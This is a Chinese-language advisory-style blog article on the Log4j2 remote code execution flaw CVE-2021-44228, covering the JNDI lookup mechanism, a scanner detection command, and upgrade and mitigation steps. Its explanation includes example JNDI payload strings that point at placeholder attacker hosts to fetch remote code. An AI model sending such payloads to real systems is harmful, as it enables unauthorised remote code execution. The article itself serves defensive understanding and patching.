news 2026/7/14 20:56:07

CVE-2021-44228_ ApacheLog4j2远程代码执行漏洞

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
CVE-2021-44228_ ApacheLog4j2远程代码执行漏洞

CVSS评分:10.0(满分)

CVE-2021-44228_ ApacheLog4j2远程代码执行漏洞

  • 1. 漏洞原理
  • 2. 漏洞危害
  • 3. 漏洞修复
    • 升级版本修复
    • 缓释方案

1. 漏洞原理

Apache Log4j2 作为广泛使用的 Java 日志库,支持一种叫做Lookup(查找替换)的机制,用于在日志消息中动态注入变量或外部内容。

例如:

${jndi:ldap://malicious-server/exploit}

这是一个 JNDI Lookup 表达式,它让 Log4j 去调用 Java Naming and Directory Interface(JNDI) 去解析某个 URL。

然而,在受到漏洞影响的 Log4j 版本中,JNDI 查找可以从 LDAP、RMI、DNS 等远程服务器获取并执行代码。攻击 step:

  1. 攻击者构造 payload:例如 HTTP User‑Agent 或其他可被日志记录的字段包含${jndi:ldap://attacker.com/malicious}
  2. 目标应用接收请求
  3. Log4j 记录日志消息,发现字符串中的 JNDI Lookup
  4. JNDI 启动并向攻击者控制的服务器发起 LDAP(其他协议也可以)请求
  5. 攻击者服务器返回一个恶意 Java 类
  6. 恶意类被执行,导致任意代码执行(RCE)

检测方法(需要机器有出网的权限):

nuclei -u http://xxx.xxx.xxx/ -t nuclei-templates/http/cves/2021/CVE-2021-44228.yaml

2. 漏洞危害

微步标记,极度高危,应立刻修复:

3. 漏洞修复

升级版本修复

官方已发布修复版本:https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

升级 Log4j 到修补版本:

  • 升级到 Log4j 2.16.0 或更高(2.15.0可能不稳定)
  • 更高版本(如 2.17.x)已彻底禁用了可能的远程 JNDI Lookup。

缓释方案

1、设置 JVM 系统变量或环境变量:

-Dlog4j2.formatMsgNoLookups=true

或者:

exportLOG4J_FORMAT_MSG_NO_LOOKUPS=true

这将阻止 Log4j 解析 Lookup 表达式,从而降低攻击面。

2、移除 JndiLookup 类

在无法升级时,可以手动从 JAR 包中移除 JNDI 代码:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

这能阻止 JNDI Lookup 类被加载。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/7/2 4:28:05

高性能计算中的C++优化

1、非修改序列算法这些算法不会改变它们所操作的容器中的元素。1.1 find 和 find_iffind(begin, end, value):查找第一个等于 value 的元素,返回迭代器(未找到返回 end)。find_if(begin, end, predicate):查找第一个满…

作者头像 李华
网站建设 2026/6/28 23:37:49

三步快速摸清陌生研究领域,轻松搞定文献调研

对于研究生和博士生而言,科研生涯中往往存在着几个令人焦虑的“至暗时刻”:研究生开题、博士确定研究方向,以及申请基金前的立项论证。这些阶段的核心任务惊人的一致——你需要在一个有限的时间内,快速、全面、深入地了解某个陌生…

作者头像 李华
网站建设 2026/7/6 16:00:38

Maven踩坑指南:依赖冲突专治不服,范围聚合玩明白!

谁说Maven只有枯燥的配置?今天咱用“唠嗑式”教学,把依赖冲突、依赖范围、项目聚合拆解得明明白白,新手也能秒懂😜 一、依赖冲突:Maven版“版本打架”怎么破? 咱先还原一个真实场景:你开开心心…

作者头像 李华
网站建设 2026/7/9 6:01:44

AI原生应用领域思维树的创新模式探讨

AI原生应用领域思维树的创新模式探讨 关键词:AI原生应用、思维树(Tree of Thoughts, ToT)、大语言模型(LLM)、多步推理、生成式AI 摘要:随着生成式AI技术的爆发,“AI原生应用”(AI-N…

作者头像 李华
网站建设 2026/6/26 16:11:15

游戏在 HarmonyOS 上如何“活”?

子玥酱 (掘金 / 知乎 / CSDN / 简书 同名) 大家好,我是 子玥酱,一名长期深耕在一线的前端程序媛 👩‍💻。曾就职于多家知名互联网大厂,目前在某国企负责前端软件研发相关工作,主要聚…

作者头像 李华